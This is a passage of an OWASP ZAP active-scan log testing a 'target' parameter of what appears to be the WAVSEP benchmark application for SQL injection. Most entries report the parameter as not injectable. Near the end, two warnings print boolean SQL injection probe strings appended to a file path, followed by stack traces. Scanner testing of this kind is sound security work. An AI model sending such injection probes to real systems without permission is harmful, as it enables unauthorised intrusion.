org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 99 column in query 8830301 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 8830433 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 999 column in query 8836465 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8836995 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8837602 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8837946 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 8837946 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 8837951 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 8838377 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 8838379 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 8838579 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8839102 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8839552 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8840141 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8840701 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8841235 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8841691 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8842169 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8842822 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8843379 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8844232 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8844719 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8845176 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8845735 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8846317 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8847196 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8847702 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8848101 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8848590 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8849220 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8849952 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8850584 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8851096 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8851527 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8851930 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8852460 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8852986 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8853576 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8854125 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8854879 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8855347 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8855826 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8856359 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8856819 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8857359 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8857463 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 8857463 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 8857468 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 8857885 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 8857887 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 8858202 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8858813 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8859337 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8859935 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8872516 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8873074 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8873705 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8874368 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8874917 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8875643 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8876119 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8876686 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8877321 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8877888 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8877939 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 8877956 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 99 column in query 8878464 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8878624 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8879219 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8879379 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8880027 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8880051 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8880720 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8880726 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8881677 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8881686 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8882832 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8882838 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8883535 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8883549 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8884116 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8884134 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8884783 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8884787 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8885468 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8885470 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8886101 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8886109 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8886951 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8886967 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8887560 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8887573 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8888147 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8888156 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8888774 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8888778 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8889319 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8889326 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8889812 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8890939 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8890940 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8891474 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8891475 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8892242 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8892246 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8892850 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8892869 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8893461 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8893480 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8894128 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8894131 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8894669 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 8894669 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 8894675 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 8895076 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 8895085 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 8895196 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8895226 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8895661 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8895688 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8896354 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8896385 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8896880 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8896894 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8897701 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8897746 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8898314 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8898322 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8899025 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8899034 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8899539 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8899562 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8900135 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8900138 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8900777 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8900779 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8901915 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8901930 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8902503 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8902509 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8903114 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8903119 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8903704 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8903752 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8904345 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8904346 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8905764 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8905769 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8906409 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8906427 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8907207 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8907249 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8908016 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8908037 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8908608 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8908616 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8909199 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8909204 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8909831 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8909854 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8910408 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8910413 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8910977 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8910980 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8911626 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8911631 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8913878 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8913897 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8914543 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8914681 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8914983 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8915330 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 8915330 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 8915337 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 8915562 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 8915564 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 8915702 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8915715 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8916316 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8916327 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8916940 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8916953 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8917488 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8917660 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8918110 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8918169 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8919003 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8919053 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8919883 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8919925 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8920878 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8920929 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8921568 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8921578 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8922161 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8922162 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8922306 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 1166=8762 AND (1181=1181] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 1166=8762 AND (1181=1181 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922307 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 1876=1876 AND (2271=2271] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 1876=1876 AND (2271=2271 at 